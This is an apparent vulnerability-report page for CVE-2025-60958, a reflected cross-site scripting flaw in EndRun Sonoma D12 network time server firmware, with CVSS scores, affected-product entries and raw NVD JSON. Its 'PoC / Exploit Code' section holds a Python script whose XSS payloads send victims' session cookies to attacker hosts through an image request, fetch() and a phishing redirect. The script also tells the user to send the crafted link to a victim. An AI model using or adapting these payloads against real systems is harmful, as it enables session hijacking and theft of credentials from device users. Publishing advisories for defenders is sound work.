Security Vulnerability Report
中文
CVE-2025-60958 CVSS 7.3 HIGH

CVE-2025-60958

Published: 2025-10-06 17:16:07
Last Modified: 2025-10-10 16:36:06

Description

Cross Site Scripting (XSS) vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to gain sensitive information.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:* - NOT VULNERABLE
EndRun Technologies Sonoma D12 Network Time Server F/W 6010-0071-000 Ver 4.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60958 - EndRun Sonoma D12 XSS PoC # Vulnerability: Reflected Cross-Site Scripting (XSS) # Affected: Sonoma D12 Network Time Server F/W 6010-0071-000 Ver 4.00 # Researcher: xdiv-sec import requests import urllib.parse TARGET_URL = "http://<target_ip>/cgi-bin/" # Replace with actual vulnerable endpoint # Malicious JavaScript payload to steal session cookies payload = """ <script> var img = new Image(); img.src = 'http://attacker-server.com/steal?cookie=' + document.cookie; </script> """ # URL-encode the payload for injection into the vulnerable parameter encoded_payload = urllib.parse.quote(payload) # Construct the malicious URL (example with a vulnerable parameter) malicious_url = f"{TARGET_URL}?param={encoded_payload}" print(f"[+] Malicious URL generated:\n{malicious_url}") print("[+] Send this URL to a victim with low-privilege credentials to trigger XSS") # Example: Direct exploitation via requests (requires valid session) # session = requests.Session() # session.post(f"{TARGET_URL}login", data={"username": "user", "password": "pass"}) # response = session.get(malicious_url) # print(f"[+] Response status: {response.status_code}") # Alternative: Cookie stealing payload cookie_stealer = """ <script>fetch('http://attacker.com/log?c='+document.cookie)</script> """ print(f"\n[+] Cookie stealer payload:\n{cookie_stealer.strip()}") # Alternative: Redirect-based payload redirect_payload = """ <script>window.location='http://attacker.com/phishing?session='+document.cookie</script> """ print(f"\n[+] Redirect payload:\n{redirect_payload.strip()}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60958", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:06.620", "lastModified": "2025-10-10T16:36:06.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting (XSS) vulnerability in EndRun Technologies Sonoma D12 Network Time Server (GPS) F/W 6010-0071-000 Ver 4.00 allows attackers to gain sensitive information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:endruntechnologies:sonoma_d12_firmware:6010-0071-000:*:*:*:*:*:*:*", "matchCriteriaId": "6F239BEA-C83D-46D5-A558-478D6F01A27A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:endruntechnologies:sonoma_d12:4.00:*:*:*:*:*:*:*", "matchCriteriaId": "2D229C97-27FA-4DC6-9EB9-7757C6638143"}]}]}], "references": [{"url": "http://endrun.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "http://sonoma.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://xdiv-sec.github.io/vulnerability-research/advisories/2025-10-03-sonoma-d12", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}